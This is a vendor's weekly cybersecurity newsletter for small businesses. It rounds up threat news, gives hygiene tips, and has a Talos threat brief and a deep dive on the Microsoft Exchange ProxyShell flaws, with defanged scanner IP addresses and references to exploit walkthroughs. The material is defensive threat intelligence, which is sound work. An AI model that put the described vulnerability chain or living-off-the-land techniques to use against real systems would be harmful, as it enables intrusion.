This Week in Issue

This week, we honor the brave men and women who gave their lives in service to our country. Their sacrifice is the foundation of the freedoms we enjoy every day. let us pause to remember those who never came home. From all of us at Nexus-Dragon, we thank our fallen heroes and their families for their courage, commitment, and legacy.

A new Russian cyber-espionage group, Laundry Bear, is targeting Western governments with custom malware, escalating concerns over state-sponsored threats. KrebsonSecurity endured a massive 6.3 Tbps DDoS attack, underscoring the scale of modern disruption campaigns. DragonForce ransomware exploited SimpleHelp in MSP supply chains, while SEO poisoning tactics spread Bumblebee malware via fake admin tools. TikTok is the latest malware vector, with threat actors using viral videos to push info-stealers through “ClickFix” scams. The FBI also warns of Luna Moth targeting law firms with extortion campaigns.

CYBER NEWS ROUNDUP

Nexus-Dragon Cybersecurity Roundup: News Articles from Around the Web Relevant to the SMB

A newly identified Russian cyber-espionage group, dubbed Laundry Bear, is targeting government entities and NGOs in North America and Europe with stealthy, custom-built malware. These advanced persistent threats (APTs) signal increased risk for supply chain partners and organizations with sensitive ties. Nexus-Dragon flags this as critical for SMBs that may unknowingly serve as gateways to larger targets.
Read more: New Russian Cyberspy Crew 'Laundry Bear'

The latest SANS ISC diary reveals a sharp rise in malicious scanning activity, including attempts to exploit outdated Apache servers and weak RDP ports. SMBs are often soft targets due to default configurations or poor patch hygiene. Nexus-Dragon urges proactive log monitoring and firewall hardening.
Read more: ISC Diary: RSS/31972

A massive distributed denial-of-service (DDoS) attack hit KrebsOnSecurity, nearly reaching 6.3 Tbps, illustrating the sheer volume attackers can now unleash. SMB websites and client portals with weak defenses could be easily overwhelmed. Nexus-Dragon recommends assessing DDoS readiness and engaging mitigation partners now—not after an outage.
Read more: KrebsonSecurity Hit with Near-Record 6.3 Tbps DDoS

LevelBlue explores how attackers abuse mshta.exe to execute remote payloads and how CyberChef can dissect such activity. This method is especially dangerous because it bypasses common defenses by blending into normal system activity. Nexus-Dragon advises SMBs to disable unnecessary Windows scripting tools and invest in behavioral detection solutions.
Read more: Hunting Malware with MSHTA and CyberChef

Threat actors exploited the remote support tool SimpleHelp to launch ransomware attacks against MSPs and their clients. This supply chain compromise threatens dozens of downstream businesses who rely on third-party IT providers. Nexus-Dragon stresses vendor risk management and insists SMBs validate how service providers secure their remote tools.
Read more: DragonForce Ransomware Abuses SimpleHelp

Cybercriminals are using poisoned search results to lure users into downloading malware-laced copies of popular network tools like Zenmap. This campaign highlights how attackers exploit trusted tools to deceive tech-savvy SMB staff. Nexus-Dragon encourages verified software sourcing and browser-based download scanning.
Read more: Bumblebee Malware Distributed via SEO Poisoning

The FBI warns that Luna Moth is running phishing campaigns against law firms, stealing sensitive data and demanding extortion payments without deploying ransomware. Professional services firms—especially those handling client PII—are at elevated risk. Nexus-Dragon recommends secure email gateways and mandatory phishing simulation training for staff.
Read more: FBI Warns of Luna Moth Extortion Attacks

Hackers are using TikTok trends to drive users to fake tech-support sites, which install infostealer malware under the guise of fixing system issues. SMB employees using corporate devices on social platforms are highly vulnerable. Nexus-Dragon advises web filtering and strong endpoint controls to block malicious redirects.
Read more: TikTok Videos Push Infostealer Malware

This week’s APT roundup reveals sophisticated browser-based threats and NSIS installers laced with spyware, all designed to evade detection and persist silently. SMBs with outdated browsers or unvetted extensions face significant risk. Nexus-Dragon recommends regular browser hygiene and staff training to identify shady extensions.
Read more: Weekly Recap: APT Campaigns & Browser Threats

Cybercriminals are tricking users into downloading spyware through counterfeit VPN and browser installers using the NSIS packaging tool. SMBs that allow BYOD or unmanaged installs are prime targets. Nexus-Dragon urges standardized software deployment policies and download whitelisting.
Read more: Hackers Use Fake VPN and Browser Installers

SANS ISC provides essential guidance on securing your authorized_keys file in SSH configurations, often overlooked yet critical for preventing unauthorized access. Poor SSH hygiene can lead to backdoor access into business-critical systems. Nexus-Dragon suggests auditing all key-based access and enforcing key rotation schedules.
Read more: Securing Your SSH authorized_keys File

Why This matters

This week’s threats highlight an urgent and growing danger: attackers are evolving faster than many organizations can defend. From the rise of Laundry Bear, a Russian APT targeting Western institutions, to malware campaigns abusing trusted tools like Zenmap and remote support platforms like SimpleHelp, cybercriminals are blending stealth, social engineering, and supply chain compromise into highly effective attacks. CISA’s latest advisories reinforce the risk, calling attention to exploitable vulnerabilities in everyday systems like SSH and public-facing applications. Small and mid-sized businesses—often downstream of larger targets yet lacking enterprise-grade defenses—are increasingly in the crosshairs. With adversaries exploiting everything from TikTok to fake VPN installers, Nexus-Dragon urges SMBs to adopt proactive, layered cybersecurity strategies now—because waiting is no longer an option.

Cyber Hygiene Tips – Week of May 26, 2025

Looking into blocking or tightly restrict the use of tools like mshta.exe, which are often exploited by attackers to run hidden malicious scripts, as highlighted in this week’s malware hunting reports.

Verify and audit all remote access tools; these can be exploited in ransomware campaigns if misconfigured or left exposed.

Download software only from verified sources and enforce validation checks—fake VPN and browser installers are actively being used to distribute spyware.

Review SSH configurations, especially the authorized_keys file, to ensure proper permissions, remove unused keys, and rotate them regularly to prevent unauthorized access.

Strengthen defenses against large-scale DDoS attacks by deploying rate limiting, web application firewalls (WAFs), and CDN services critical after the near-record attack on KrebsonSecurity (this is hard to do for a SMB, consult your IT team).

Train staff to avoid downloading network tools from search results, as attackers are using SEO poisoning to trick users into installing malware-laced copies of trusted apps.

Implement DNS and web filtering to block access to malicious redirect sites, which are being pushed through platforms like TikTok in social engineering campaigns.

Regularly audit browser extensions and remove unverified or unnecessary add-ons, as browser-based APT threats continue to rise.

For MSPs and IT service providers, enforce strict client segmentation and least privilege controls to contain potential breaches and reduce lateral movement.

Ensure legal and compliance teams are looped into your incident response plans, especially as extortion attacks without ransomware like those from Luna Moth target professional services.

Government advisories

Guidance for SIEM and SOAR Implementation
https://www.cisa.gov/resources-tools/resources/guidance-siem-and-soar-implementation

AI Data Security Best Practices: Securing Data Used to Train and Operate AI Systems
https://www.cisa.gov/resources-tools/resources/ai-data-security-best-practices-securing-data-used-train-operate-ai-systems

Primary Mitigations to Reduce Cyber Threats to Operational Technology
https://www.cisa.gov/resources-tools/resources/primary-mitigations-reduce-cyber-threats-operational-technology

THREAT FOCUS INFORMATION

Threat Intelligence Brief: Rare Red Flags — Cisco Talos Identifies Scarcity Signals in Cyber-Espionage Campaigns

Overview
Cisco Talos researchers have uncovered a nuanced set of “scarcity signals”—unusual behaviors that, while rare, may serve as high-fidelity indicators of advanced cyber-espionage activity. The blog post outlines how threat actors are leveraging uncommon command-line arguments, unorthodox execution chains, and stealthy evasion techniques to persist within victim environments while avoiding detection. These activities, although individually rare, when analyzed in context, reveal distinct operational patterns of advanced persistent threats (APTs), likely linked to state-sponsored actors conducting intelligence collection operations.

Threat Actor Profile
While Talos does not attribute the observed activity to a named threat group, the operational maturity, command-and-control sophistication, and use of advanced evasion techniques align with nation-state-sponsored espionage operations. These campaigns are suspected to target sectors such as government, defense industrial base (DIB), and critical infrastructure—often exploiting low-noise behavioral indicators that fly under the radar of signature-based detection systems.

Tools and Techniques
Attackers in these campaigns use a mix of legitimate system utilities and custom payloads to evade endpoint detection and response (EDR) solutions. Tools and TTPs include:

• Uncommon PowerShell flags and command-line arguments

• Living-off-the-land binaries (LOLBins) such as mshta.exe or regsvr32.exe

• Non-standard registry persistence

• Obfuscated malware loaders and reflective DLL injection

Mapped MITRE ATT&CK Techniques

• T1059.001 – Command and Scripting Interpreter: PowerShell

• T1218 – Signed Binary Proxy Execution

• T1112 – Modify Registry

• T1055 – Process Injection

• T1036 – Masquerading

Strategic Implications
This campaign exemplifies a broader evolution in cyber-espionage tradecraft: shifting from high-volume, noisy intrusions to precise, stealthy operations using rare artifacts that evade traditional defenses. For organizations in sensitive sectors, this signifies a move away from “detect everything” paradigms to approaches grounded in contextual anomaly detection and behavioral baselining. The presence of these signals may be the only trace of an ongoing compromise—underscoring the need for deeper telemetry analysis and adversary emulation capabilities.

Defensive Recommendations

• Implement anomaly-based detection rules that flag rare or non-standard PowerShell flags, registry writes, or parent-child process relationships.

• Hunt for known LOLBins being used in unusual ways, especially with unsigned scripts or remote execution chains.

• Use endpoint detection platforms that support behavioral mapping and can log command-line arguments.

• Review registry changes regularly, especially for persistence keys in HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

• Enforce strict controls on PowerShell usage through constrained language mode and script block logging.

Why This Matters
These “scarcity signals” represent a growing class of hard-to-detect adversary behaviors—highlighting how threat actors adapt as defenders improve. As geopolitical tensions rise and global cyber-competition intensifies, attackers are increasingly motivated to remain undetected in high-value networks. For SMBs and large enterprises alike, especially those serving sensitive industries, recognizing these signals could be the only warning of a deeply embedded adversary. Cybersecurity teams must evolve their detection strategies to prioritize rare, high-confidence signals over generic noise.

Source
Cisco Talos Intelligence – Scarcity Signals Are Rare Activities Red Flags

Deep Dive: ProxyShell Vulnerabilities in Microsoft Exchange – What to Do

Technical Summary
The ProxyShell vulnerabilities CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207—are a chain of critical flaws in Microsoft Exchange Server that allow remote code execution without authentication. The chain begins with CVE-2021-34473, a pre-auth path confusion flaw enabling attackers to bypass access control, followed by CVE-2021-34523 for privilege escalation via the PowerShell backend, and finally CVE-2021-31207, a post-auth arbitrary file write leading to full remote code execution. All three were patched in Microsoft security updates KB5001779 and KB5003435 but remain highly dangerous when unpatched.

Recent Exploitation Activity
Security researchers have observed a resurgence in scanning and exploitation attempts against vulnerable Exchange servers, with attackers using known methods to identify and exploit unpatched systems. Malicious infrastructure has been tied to IP addresses actively probing for ProxyShell exposure, including:

• 190.2.150[.]101

• 204.216.147[.]144

• 66.63.179[.]106

• 89.39.121[.]48

These IPs have been flagged for enumeration activity consistent with reconnaissance for ProxyShell exploitation, which often precedes attempts to deploy web shells or steal sensitive data. The scanning is opportunistic and global, with threat actors targeting government, healthcare, finance, and small-to-midsize businesses (SMBs) with minimal detection (do your own Due Diligence).

Why This Threat Is Significant
ProxyShell vulnerabilities provide unauthenticated attackers with deep access to Exchange environments, making them a persistent favorite for ransomware operators, cybercriminals, and APT groups. Despite being patched in 2021, many organizations especially SMBs have not applied the necessary updates, leaving them vulnerable to mass exploitation. As Exchange remains a core communication platform for thousands of businesses, compromise can lead to email hijacking, data exfiltration, or full domain compromise. This ongoing threat reflects how legacy software, when unpatched, continues to serve as low-hanging fruit for attackers.

Defensive Recommendations

• Patch Immediately: Ensure Microsoft Exchange servers are updated with KB5001779 and KB5003435, which fix all three ProxyShell CVEs.

• Monitor for Indicators: Check logs and EDR solutions for access attempts from the listed malicious IPs or signs of /autodiscover/autodiscover.json exploitation.

• Limit Exposure: Restrict external access to Exchange Admin Center and Remote PowerShell endpoints where possible.

• Scan for Web Shells: Perform regular scans of Exchange directories for suspicious ASPX files or unauthorized scripts.

• Enable Network Segmentation: Isolate Exchange servers from critical internal systems to limit lateral movement if breached.

Disclaimer
This report includes raw threat intelligence such as IP addresses and TTPs, which may evolve. Always validate findings within your own environment and threat model.

References
CVE-2021-34473
CVE-2021-34523
CVE-2021-31207
ProxyShell Reproduction Exploit (Medium)
BlackHat USA 2021 Presentation on Exchange Attacks
Walkthrough of ProxyShell Exploitation (Y4Y)
Original Sophos Report

Discover the Nexus-Dragon Ecosystem

Explore Everything at Nexus-Dragon.com. Your Launchpad for Elite Cybersecurity Training and Business-Grade Protection

Comprehensive Learning Subscription (CLS)
The CLS program is more than just certification prep it’s a full-spectrum, 4-year guided learning pathway for professionals committed to mastering information security and gaining long-term expertise in the field.

Included in CLS:

• Full prep and resources for CISSP, CEH, CASP+, GBK, and Cyber Training certifications

• Access to interactive cloud security labs, recorded workshops, and scheduled mentorship

• Built-in progress tracking, skill assessments, and a structured roadmap to job-ready proficiency

• Complimentary access to our Basic Cyber Operations (BCO) course for foundational knowledge in network security and incident response

Dragon Armor Cybersecurity Suite
Tailored for small and mid-sized businesses, Dragon Armor delivers serious protection without the complexity of big-ticket enterprise tools. It’s everything you need to secure your environment designed to scale as you grow.

Included with Dragon Armor:

• AI-driven threat detection, endpoint security, and real-time response

• Built-in alignment with HIPAA, NIST Cybersecurity Framework (CSF), and ISO 27001

• Guided onboarding and a full cybersecurity risk assessment to identify gaps

• Multi-year price lock and flexible plans that grow with your organization’s needs

Stay Ahead of Cyber Threats with Curated Threat Intelligence

In today’s fast-moving cyber landscape, raw data isn’t enough you need actionable intelligence tailored to your business. Our Curated Threat Intelligence Service delivers real-time insights, customized threat profiles, and prioritized alerts focused on your industry, your risks, and your critical assets.

We filter the noise, track evolving threat actors, and highlight only what matters most so you can act faster, defend smarter, and stay resilient. Every report includes high-confidence indicators of compromise (IOCs), mapped MITRE ATT&CK techniques, and strategic recommendations designed to strengthen your defenses.

Protect your business with intelligence built for action, not overwhelm.
Contact us today to start receiving tailored threat intelligence you can trust.

Whether you’re focused on penetration testing, compliance, data privacy, or building out your security operations, Nexus-Dragon equips you with the tools, knowledge, and strategies to lead from the front.

NEW SERVICE NOW ONLINE!

Dragon Armor Advisors (DAA): We Handle the Hiring You Get the Cyber Experts

Hiring skilled cybersecurity professionals is expensive, time-consuming, and often leads to mismatches. Dragon Armor Advisors (DAA) changes the game by doing the hard part for you. We recruit, vet, train, and manage elite cybersecurity talent so you don’t have to.

Whether you need a security analyst, compliance expert, or incident response lead, Nexus-Dragon handles the full talent pipeline. Our advisors come from top-tier backgrounds, including NSA, DoD, and CISA, and are ready to integrate seamlessly into your team. You gain immediate access to professionals who are already mission-ready without the cost, delays, or risks of full-time hiring.

Let DAA fill your cybersecurity gaps while you stay focused on growth. Keep them as long as you need and if you want to bring them on permanently, we’ll make it happen.

Sponsor Spotlight: Tenable

Tenable Nessus® Expert is the gold standard for vulnerability assessment—built for security teams facing limited resources and a fast-changing threat landscape. It automates point-in-time assessments to help you quickly find, prioritize, and remediate vulnerabilities across operating systems, devices, and applications.
Discover how Nessus Expert can strengthen your defenses.

Ready to move forward?
For full details, customized walkthroughs, or to begin onboarding, contact our team at:

[email protected]
Or explore our solutions directly at:

Meet the Nexus-Dragon

TELL US HOW WE’RE DOING!

Your feedback is VERY valuable! Let us know how we can improve future issues.

🔗 Submit Feedback

Legal Disclaimer

The information provided is for general purposes only and is accurate to the best of our knowledge. We do not guarantee its accuracy or reliability and are not responsible for any outcomes resulting from its use. This post contains affiliate links, meaning we may earn a commission if you purchase through them, at no additional cost to you. Written with the help of our little A.I!

All trademarks belong to their respective owners.

CONTACT US

📞 850-684-0278